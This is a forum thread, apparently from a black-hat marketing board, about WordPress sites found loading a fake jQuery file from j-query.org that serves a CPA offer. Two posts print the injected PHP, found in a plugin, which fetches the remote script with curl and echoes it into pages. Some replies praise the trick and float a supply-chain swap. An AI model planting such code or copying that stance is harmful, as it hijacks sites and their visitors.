1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

j-query hacked?

Discussion in 'BlackHat Lounge' started by fellllla, Nov 1, 2011.

  1. fellllla

    fellllla Newbie

    Joined:
    Feb 20, 2010
    Messages:
    42
    Likes Received:
    6
    Location:
    Utah
    Can anyone explain to me why this

    http://www.j-query.org/jquery-1.6.4.min.js


    Contains a CPA offer?

    This JS is being populated in one of my sites.
     
  2. chipmunk951

    chipmunk951 Senior Member

    Joined:
    May 10, 2010
    Messages:
    1,011
    Likes Received:
    443
    Occupation:
    IM
    Location:
    Zimbabwe
    Hahaha,

    CPA Infinity

    GG
     
    • Thanks Thanks x 1
  3. ibins

    ibins Junior Member

    Joined:
    May 9, 2011
    Messages:
    176
    Likes Received:
    39
    Location:
    really world wide
    jquery.com is official
     
    • Thanks Thanks x 1
  4. chipmunk951

    chipmunk951 Senior Member

    Joined:
    May 10, 2010
    Messages:
    1,011
    Likes Received:
    443
    Occupation:
    IM
    Location:
    Zimbabwe
    • Thanks Thanks x 2
  5. jazzc

    jazzc Moderator Staff Member Moderator Jr. VIP

    Joined:
    Jan 27, 2009
    Messages:
    2,468
    Likes Received:
    10,155
    That is so funny :D

    You 've been owned ;)
     
    • Thanks Thanks x 2
  6. zero-day

    zero-day Regular Member

    Joined:
    Aug 25, 2011
    Messages:
    349
    Likes Received:
    344
    Occupation:
    Coder
    Location:
    My Office.
    Home Page:
    The user above has been banned until he can further explain himself.
     
  7. Xyz01

    Xyz01 Regular Member Premium Member

    Joined:
    Aug 8, 2011
    Messages:
    300
    Likes Received:
    126
    Because it's not the official jquery host?

    ALWAYS, ALWAYS use jquery.org or the Google CDN.. or better yet host it yourself.
     
    • Thanks Thanks x 1
  8. m0nster

    m0nster Senior Member

    Joined:
    Oct 20, 2010
    Messages:
    1,044
    Likes Received:
    1,003
    Occupation:
    Offline Marketing
    Location:
    USA
    edit: read below
     
  9. m0nster

    m0nster Senior Member

    Joined:
    Oct 20, 2010
    Messages:
    1,044
    Likes Received:
    1,003
    Occupation:
    Offline Marketing
    Location:
    USA

    yes your correct. I'm he did some type of injection/hacking in order to replace the link you had referencing the proper jquery file.

    This is not a reflection of CPA infinity as I'm sure you understand now.

    User was banned sorry this happened to your site. I'm not a security expert but installing a security plugin if your site is wordpress based might help this guy and others from doing the same thing with a offer from another network
     
    • Thanks Thanks x 1
  10. scraper1

    scraper1 Regular Member

    Joined:
    May 28, 2011
    Messages:
    214
    Likes Received:
    207
    Location:
    Kontiki
    Home Page:
    Remember kids: Stay in school, and most importantly, obfuscate your malicious JavaScript code.
     
    • Thanks Thanks x 3
  11. zero-day

    zero-day Regular Member

    Joined:
    Aug 25, 2011
    Messages:
    349
    Likes Received:
    344
    Occupation:
    Coder
    Location:
    My Office.
    Home Page:
    Stay in school, and don't get schooled ;)
     
    • Thanks Thanks x 1
  12. zendobi

    zendobi Newbie

    Joined:
    Jul 21, 2008
    Messages:
    15
    Likes Received:
    15
    Well I just noticed it on my site too. Both a link to j-query.org, and another timed redirect right in the very top of the header in all of my php pages. Not that hard to get rid of but still retarded :)
     
  13. artizhay

    artizhay BANNED BANNED

    Joined:
    Nov 21, 2010
    Messages:
    1,867
    Likes Received:
    1,335
    Lol well that's what you get for going through a non-official site. Makes me want to make my own script, get thousands of people to rely on it, and then change it to a CPA offer. It's ingenious really.
     
  14. zendobi

    zendobi Newbie

    Joined:
    Jul 21, 2008
    Messages:
    15
    Likes Received:
    15
    Report it to MediaTemple that's where they are hosted.
     
  15. zendobi

    zendobi Newbie

    Joined:
    Jul 21, 2008
    Messages:
    15
    Likes Received:
    15
    We arent going thru a non-official site, they are finding a way into wordpress and adding a short but sweet line of code to a plugin.

    PHP:
    <?php

        
    if(function_exists('curl_init'))

        {

            
    $url "hxxp://"URL"/jquery-1.6.3.min.js"

            
    $ch curl_init();  

            
    $timeout 5;  

            
    curl_setopt($ch,CURLOPT_URL,$url); 

            
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 

            
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 

            
    $data curl_exec($ch);  

            
    curl_close($ch); 

            echo 
    "$data";

        }

    ?>
    I do have to admit, that while rather simple it is also kinda smart.
     
  16. martbost

    martbost Registered Member

    Joined:
    Mar 10, 2011
    Messages:
    76
    Likes Received:
    183
    Found the malicious code in WPZon and removed it from the "amazon.php" file for the plugin. It is at the very bottom of the file and the following should be removed completely.

    <?php
    if(function_exists('curl_init'))
    {
    $url = "http://www.j-query.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
    }
    ?>

    Sneaky little Bastard!!!